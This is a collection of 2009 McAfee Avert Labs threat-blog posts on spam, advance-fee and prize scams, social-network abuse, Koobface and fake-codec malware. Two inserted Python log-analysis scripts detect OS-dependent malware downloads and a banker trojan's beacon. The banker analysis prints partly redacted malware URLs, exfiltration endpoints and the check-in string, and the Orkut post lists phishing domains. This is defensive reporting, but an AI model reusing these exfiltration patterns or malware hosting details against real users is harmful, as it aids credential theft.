    In fact, the scammers are taking advantage of two events: the soccer World Cup in South Africa next summer and the 75th anniversary of the first flight of a major airline. Two days ago a coworker forwarded me this mail:

    Star Alliance Member Airline

    Gooday 

    South African Airways (SAA) is the largest and most important African airline and has received numerous “Best African Airline” awards from different leading magazines and international organizations. The airline was founded 1934 and celebrates its 75th anniversary in 2009. It was one of the first national airlines worldwide.
    South African Airways is offering 200 people a free opportunity and all expenses paid
    trip to watch the Fifa 2010 world cup by their ongoing promotion.
    This enables the winners for an automatic visa and a
    Free trip to watch the first and second matches on 11/06/2010 at Soccer City, Johannesburg and Green Point, Cape Town
    You are lucky to be among the selected people
    Reply with This Details
    Your full  Name
    Your full Address
    Your Email
    Your cell No
    Thanks
    Mr Kelvin Brodus
    Cordinator
    —————

    With the first part of the text stolen from a U.K.-based riding holiday website and then adding the usual “Hey, you just won a really cool prize. Just send me all your personal information” spin, this scam is certainly not the most sophisticated we shall see. But to my knowledge it is the first.

    So as you anticipate your team’s lifting the trophy next July, be careful what emails you reply to or what links you click on. For links in email, do as I do: Don’t click any of them.

    Spammers Broadcast It for FREE!

    “FREE” is by far the most commonly used term in spam mails. The word free is such a striking term that any layman, unaware of these tricks of the trade, can fall into the trap of the disguised mails sent by spammers.

    Here are a couple of the most often used sentences in spam mails:

    • We are letting you try it for FREE, you just pay the shipping costs!
    • FREE Download without limits!
    • Get your Free Trial Now!
    • Take FREE exotic vacations!
    • Get Free trial bottle!

    This barrage reminds me of the maxim “appearances can be deceiving.” The adage comes true when an innocent user falls prey to these eye-catching spam mails and regrets it later.

    Coming back to the main topic of broadcasting for “free,” we are observing a trend wherein spammers abuse social networking websites quite frequently by creating fake accounts to host spam.

    The most common trend these days is spammers inserting spoofed URLs associated with social networking and social bookmarking sites such as Blogspot, Yahoo Groups, and Google Groups, on which they host porn, health, replica watch, acai power slim, and many other categories of spam. Thus it becomes a big challenge for these sites to moderate abusive or spammy content on their networks.

    A recent and classic example of how the bad guys (spammers) take advantage of some really cool features provided by these networking websites will leave you amazed. Have a look at the following sample, which will give you a better understanding of these types of spam mails.


    Sample1

    “Get your Free Trial Now” is a hyperlink to “google.com/reader/view/user/…” Clicking it will redirect you to the web page, where the spammer has created a fake profile on social networking websites. The actual spam is in the form of an image that is again hyperlinked to the main spam website. Basically the spammers have abused the “sharing items” feature to their advantage and are spreading spam.

    The “sharing items” feature lets you share all your reading-list contents with the public.

    Why is the spammer using a different approach altogether rather than simply placing the spam URL in the mail?

    It’s very easy for anti-spam filters to cut out mails with URLs that have been recently created and are hosting spam. An example of this would be URLs with .cn domains, which host meds spam most of the time.

    Because these sites seem unable to filter and remove such content, spammers abuse social networking websites far more than any other free web-hosting site. We advise our customers to be cautious about such mails and refrain from clicking any URLs in them.

    We’ll finish with some more typical examples of how spam looks on social networking websites.

    Pharmacy

    Sample2

    Replica Watches

    Sample3

    Acai Power Slim

    Sample4

    Scammers Love Your Money

    We generally classify email messages pretending to be from a family member of a (often African) dignitary or from a desperate young woman as scams. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help and using his or her financial backing for a money transfer, the sender says that it would be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty becomes a friend with the victim and suddenly has a terrible money problem.

    For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scams, are a primary source of revenue. They also employ lottery and fake prize scams.

    In Eastern Europe senders remain discreet and hide their wealth. But in some African countries such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 observers web site, I searched the French Skyrock social networking platform and discovered the photos and videos from their exploits. Each crook has his own blog entries and is attached to a gang web page where each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

    • les banquiers arabes (the Arab bankers)
    • la banque africaine (the African bank)
    • les boucantiers de la Cote d’Ivoire (the Ivory Coast boucantiers)
    • les plus riches (the richest)
    • etc.

    Here is one example:

    According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

    In France, one naive victim recently lost €1 million!

    Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

    The naive are numerous, and cybercriminals know it. We must remain vigilant.

    Collateral Damage

    Twitter, LiveJournal, Facebook, YouTube, Fotki–what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (taken after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to flee from in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that was able to take down Twitter for several hours and significantly slow down connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests to fetch the pages hosted for this user, who had just a few days ago blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

    In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system had also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. On one hand, the attackers spoofed the email address of the blogger, which is hosted on Gmail, as the originator of the spam. As a result, the blogger’s inbox was flooded with out-of-office notifications and vacation bounces automatically sent by mail clients of people who had received this spam. This was likely part of an intimidation campaign designed to send a message to cyxymu about who was the real intended target of the DDoS. In addition, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on the servers of those blogs than would already be caused by the DDoS. 


    Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

    In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

    We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.


    URLs that were attacked include:

    http://twitter.com/cyxymu
    http://www.youtube.com/Cyxymu
    http://www.facebook.com/cyxymu
    http://cyxymu.livejournal.com
    http://cyxymu1.livejournal.com
    http://fotki.com/cyxymu

    The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

    Q2 Threats Report Released–It’s All About Botnets and Spam

    Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

    More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

    Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

    Some of the other areas we cover and discuss:

    Cybercrime as a Service
    As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

    Cybercriminals Target Twitter, Social Networks
    Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

    To view the McAfee Q2 Threats Report, go here.

    Malware From Celebrity Video: But I Thought I Just Installed a Video Player!

    Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

    In our world of anti-malware, we follow a simple formula: “Media + Celebrity = Watch out for malware.” Whether you are an eager fan or just someone surfing the web for news, beware. An Internet search with the right keywords on your favorite search engine is likely to lead you to malware. In the case we investigated, it led us to a malicious website hosted at [removed].report-cnn.com/[removed].

    Fake Video Message

    Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been used repeatedly in similar attempts in the past. With this method, the user is enticed with an attractive video but is told that a new video player program must be installed first.

    The victim clicks on a link that downloads an executable program; running it installs the malware. This is usually followed by a pop-up message reporting that the downloaded video player program is corrupted!

    Install Video Player Message

    The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entices users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user off an external link from Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

    This malicious website recognizes the target operating system by checking the User-Agent header sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delivered to Mac OS-based web browsers.
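    One way to spot this User-Agent-dependent delivery from a defender's side, as an added example that is not code from the post or from McAfee: the script below groups executable downloads per URL and OS family over constructed proxy log lines (hosts are placeholders, not the site in the post) and flags URLs that hand a different installer to different operating systems.

```python
"""Spot URLs that serve a different executable depending on the visitor's OS.

Added example, not code from the blog or from McAfee. It parses constructed
proxy log lines (pipe separated: client_ip|user_agent|url|content_disposition)
and groups download filenames per URL and OS family, mirroring the fake CNN
page that served a .exe to Windows browsers and a .dmg to Mac browsers.
"""
from collections import defaultdict
import os
import re

# Extensions we treat as "an installer was delivered"
EXECUTABLE_EXTS = {".exe", ".dmg", ".com", ".scr", ".pkg"}

# Constructed sample log; host names are placeholders, not the site in the post.
SAMPLE_LOG = """\
10.0.0.5|Mozilla/5.0 (Windows NT 6.0; rv:1.9.1) Gecko/20090624 Firefox/3.5|http://report-news.invalid/live/player|attachment; filename=MediaPlayer.exe
10.0.0.7|Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7) AppleWebKit/530.19 Safari/530.19|http://report-news.invalid/live/player|attachment; filename=MediaPlayer.dmg
10.0.0.5|Mozilla/5.0 (Windows NT 6.0; rv:1.9.1) Gecko/20090624 Firefox/3.5|http://report-news.invalid/live/index.php|inline
10.0.0.9|Mozilla/5.0 (Windows NT 5.1) Firefox/3.0|http://vendor.invalid/tools/setup|attachment; filename=setup.exe
10.0.0.9|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5) Safari/4.0|http://vendor.invalid/tools/setup|attachment; filename=setup.exe
"""

_FILENAME_RE = re.compile(r'filename="?([^";]+)"?', re.IGNORECASE)


def os_family(user_agent: str) -> str:
    """Coarse OS classification from the User-Agent header."""
    ua = user_agent.lower()
    if "windows" in ua:
        return "windows"
    if "mac os x" in ua or "macintosh" in ua:
        return "mac"
    return "other"


def delivered_extension(content_disposition: str):
    """Return the lower-cased extension of an attachment, or None if no file was sent."""
    match = _FILENAME_RE.search(content_disposition)
    if not match:
        return None
    return os.path.splitext(match.group(1).strip())[1].lower()


def find_os_cloaked_downloads(log_text: str) -> dict:
    """Map URL -> {os_family: {extensions}} for URLs whose executable differs by OS.

    Legitimate download pages also serve per-platform installers, so a hit is a
    triage lead (check how the page was reached), not a verdict on its own.
    """
    per_url = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _client, ua, url, disposition = line.split("|", 3)
        ext = delivered_extension(disposition)
        if ext in EXECUTABLE_EXTS:
            per_url[url][os_family(ua)].add(ext)

    flagged = {}
    for url, families in per_url.items():
        all_exts = set().union(*families.values())
        # More than one OS family saw this URL, and they did not all get the same file type
        if len(families) > 1 and len(all_exts) > 1:
            flagged[url] = {fam: set(exts) for fam, exts in families.items()}
    return flagged


if __name__ == "__main__":
    for url, families in find_os_cloaked_downloads(SAMPLE_LOG).items():
        print(url, families)
```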

    Downloaded Files

    The malware downloaded from this site is currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware is detected as the OSX/Puper.a Trojan. In other related cases, we are currently detecting the samples as Generic FakeAlert.a and Generic FakeAlert.c.

    We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

    Koobface Worm Turns Toward Twitter

    McAfee Avert Labs has received a new variant of the Koobface worm. Unlike the previous variants, this one spreads using Twitter by sending fake tweets.

    These fake tweets contain links to a video; some of these videos are named “My home video.” When users click these links they are prompted to install a video codec. However, upon following the instructions it actually downloads a variant of the Koobface worm and installs it.

    At McAfee we detect this variant as W32/Koobface.worm.gen.e and W32/Koobface.worm.gen.h. The detection for this variant will be available to the public in today’s release (DAT 5675).

    July Spam Report Appears

    Today McAfee released its July 2009 Spam Report, which reveals the Top 15 spam subject lines by domain, among other highlights. So what was the one subject line that was most popular in six continents this quarter? Viagra.

    For the .COM domain, “hi” and “hello” hit the most in-boxes, while Viagra and “Salute, man!” subject lines were the most common in the .UK domain.

    Among the other findings in the June Spam Report:

    • Cybercriminals try to hide from local authorities by sending their spam to foreign addresses

    • Recipients of spam are blocking emails from entire regions of the world–meaning the large quantity of spam being hosted by developing nations may hurt the growing legitimate businesses there that are trying to send valid emails

    The current Top 5 spam subject lines for the .COM domain are:

    1. Hello
    2. Hi
    3. RE: DISCOUNT 80% 0FF on Pfizer !
    4. Replica Watches
    5. Undelivered Mail Returned to Sender

    See the Top 15 subject lines for each major domain (.ORG, .UK, .CN, etc.), as well as the rest of McAfee’s July Spam Report here.

    Michael Jackson News Affects Web Traffic

    The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

    Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

    How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

    As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

    Bad News Offers Opportunity to Spread Malware

    With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.


    Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!


    But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.


    A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.


    And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

    Sex the Bait in Mass Orkut Compromise

    With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish for personal information, as well as MySpace scams and Facebook spam.

    With more than 15 percent of its traffic coming from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not-so-tech-savvy users on Orkut. They have updated the user profiles of several thousand compromised Orkut accounts, which now link to various phishing websites. These lure visiting users into divulging their personal information.

    The various phishing websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousand Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.


    We have observed scores of websites being used in this phishing attack. Here are a few of them:

    • http://orkutsexlogi[blocked].tk
    • http://s3x[blocked].kilu.de
    • http://orkutst[blocked].tk
    • http://album[blocked].kilu.de
    • http://priya[blocked].freehostia.com

    If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

    Spammers Take Advantage of Air France Crash

    As we foresaw, spammers have used the Air France AF447 disaster to catch people’s attention and prompt them to open fake news emails related to this event. Less than two weeks after the crash, the first emails started to spread. We’ve seen the following subjects:

    • A-330 blackbox record
    • Another plane crushed
    • Last seconds of plane

    When opened, all these emails display advertisements promoting Canadian pharmacy products such as Viagra and Cialis.


    Two days ago, we saw several million spam messages with these subjects. Today this number is only half as big.

    As usual, these spammers are disrespectful and do not hesitate to use the most shocking events to promote their shady businesses.

    I thank my colleague Adam Wosotowsky for his invaluable assistance with this post.

    New McAfee Whitepaper on Browser Attacks

    Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

    Web Browsers: An Emerging Platform Under Attack
    “The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

    Other areas the paper covers include:

    • The shift in spam to mainly malicious web link usage

    • “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

    • Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

    • Use of malicious video banners placed in advertisement networks

    • Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

    Download the paper in its entirety here.

    McAfee Releases June Spam Report

    Today we released our Spam Report for the month of June. In it we discuss two key findings:

    President Obama’s First 100 Days of Spam
    Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

    Identifying Spam Trends of the Future
    Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

    What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long as we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

    McAfee Unveils H*Commerce Web Film Series on Cybercrime

    Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

    The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

    The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

    Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

    Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

    Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

    McAfee Releases First-Quarter Threats Report

    Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

    Other Key Findings

    The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

    Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

    Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

    Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

    You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

    Swine Flu Subjects and e-Pharmacy Sites

    We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

    The image below is a collection of a bunch of swine flu spams:

    Swine Flu Spams

    You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

    Here is a screenshot of the e-pharmacy they all lead to:

    Swine Flu e-Pharm Site

    You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

    As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

    Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

    A closer look at a Swine Flu spam

    It’s been just a few days since we started talking about spam using Swine Flu as a way to catch users’ attention to sell pills. This time, however, the message is not very “healthy”:

    Swine Flu

    The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

    As we saw yesterday in David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch users’ attention. But remember, this is spam; they use the logo to make users believe that the news is true.

    The links lead to two different malware files:

    http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar
    => Foto.29.04.2009.com

    http://[removed].ru./uploaded/alerta.php?atencao=ver
    => Foto.29.04.2009.jpg.exe

    They are identified as PWS-Banker-dldr and PWS-banker-gen.g.

    The file Foto.29.04.2009.com is a downloader that fetches the file at the URL below and drops it as C:\WINDOWS\temp\configura.exe:

    http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

    This file is identified as PWS-Banker-gen.b.

    This is a common banker malware that overlays a fake image over the real banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter his personal information and even his credit card data:

    overlayed bank image

    overlayed bank image

    overlayed bank image

    The information about the hacked machine and the banking data are then posted to the sites below:

    hxxp://[removed-1].100webspace.net/post.php
    hxxp://[removed-2].100webspace.net/post.php
    hxxp://[removed-3].100webspace.net/post.php
    hxxp://[removed-4].100webspace.net/post.php

    This is the string appended to the URLs above:

    tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&
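    The check-in string above is distinctive enough to hunt for in proxy logs. The script below is an added example, not code from the post or from McAfee: it recognises the post.php beacon by all three indicators (the endpoint, tipo=inf, and the INFECTADO marker) and pulls out the machine name and user name the malware reports, so an incident responder can tell which host is infected. The log lines and host names in it are constructed placeholders.

```python
"""Parse the banker's check-in beacon from proxy logs.

Added example, not code from the blog or from McAfee. It looks for the
tipo=inf / inf=INFECTADO string appended to post.php and extracts the
machine name and user name the malware reports. Hosts are placeholders.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines, "<method> <url>" per line (not real traffic).
SAMPLE_LOG = [
    "POST http://placeholder-1.100webspace.net/post.php?tipo=inf&tip=WKS-0042+jsilva&inf=INFECTADO%0D%0A&",
    "GET http://www.example.invalid/index.php?tipo=news&page=2",
    "POST http://placeholder-2.100webspace.net/post.php?tipo=inf&tip=LAB-PC+admin&inf=INFECTADO%0D%0A&",
    "GET http://intranet.invalid/post.php?tipo=inf&tip=no-marker",
]


def parse_beacon(url: str):
    """Return {host, machine, user} for a URL carrying the beacon, else None.

    All three indicators from the post are required (a post.php endpoint,
    tipo=inf, and the INFECTADO marker), so a lone tipo=inf parameter on some
    unrelated PHP page does not trigger a finding.
    """
    parts = urlsplit(url)
    if not parts.path.endswith("/post.php"):
        return None
    query = parse_qs(parts.query)  # '+' becomes ' ', %0D%0A becomes CRLF
    if query.get("tipo") != ["inf"]:
        return None
    marker = query.get("inf", [""])[0].strip()
    if marker != "INFECTADO":
        return None
    # tip=[machinename]+[username]: the '+' (now a space) separates the two fields
    machine, _, user = query.get("tip", [""])[0].partition(" ")
    return {"host": parts.hostname, "machine": machine, "user": user}


def scan_log(lines):
    """Return one finding per log line that matches the beacon."""
    findings = []
    for line in lines:
        method, _, url = line.partition(" ")
        hit = parse_beacon(url)
        if hit:
            hit["method"] = method
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']}: infected host {f['machine']} (user {f['user']})")
```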

    But one image inside this malware caught our attention. The image below tries to disguise itself as the website of the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

    overlayed bank image

    They attempt to steal usernames and passwords for this site. If the miscreants got access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

    As we can see, an apparently innocent e-mail can cause your banking information to be stolen and can have even more serious implications, as in the case above.

    Looking at Swine Flu Spam Globally

    Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers.

    Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

    Percent Increase of Swine Flu in Subject Line

    Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

    From the beginning of the campaigns we have seen it generated from all over the world. That is not really a surprise when one considers the global nature of botnets and spam, but the country breakdown is interesting to look at. It seems that Brazil, the United States, and Germany are the biggest sources at the moment:

    Countries Sending Swine Flu Spam

    No safe country from spammers, eh? When you consider that on any given day there are between 80 and 170 billion email messages, with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal, and it is very hard to protect against.

    April Email and Spam Volumes

    We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case it’s a redirect to a Russian-based site that requires our old friend the fake codec to be installed to view the movie:

    Swine Flu Redirect to Fake Codec

    Malware writers, spammers, and scammers are lowlifes. They will use any high-profile media event or high-impact news story to push their wares, including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic, go to the World Health Organization website.

    Swine Flu Spam

    The Swine Flu pill spam has started, and it’s taking a few Hollywood stars’ names in vain. Nothing out of the ordinary with the sites on the far end yet, though I do expect Oseltamivir [AKA Tamiflu] will get some extra exposure once the affiliate pill sites are updated.

    Swine Flu

    Subjects:

    First US swine flu victims!
    US swine flu statistics
    Salma Hayek caught swine flu!
    Swine flu worldwide!
    Swine flu in Hollywood!
    Swine flu in USA
    Madonna caught swine flu!

    Also we’ve noticed domain name registrations mentioning the word swine are up by about 30 times and you can bet your daughters it’s not all going to be “whitehat” SEO.

    The Carbon Footprint of Spam

    Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

    • The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
    • Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
    • Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
    • If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
    • Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
    • While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

    Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

    Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

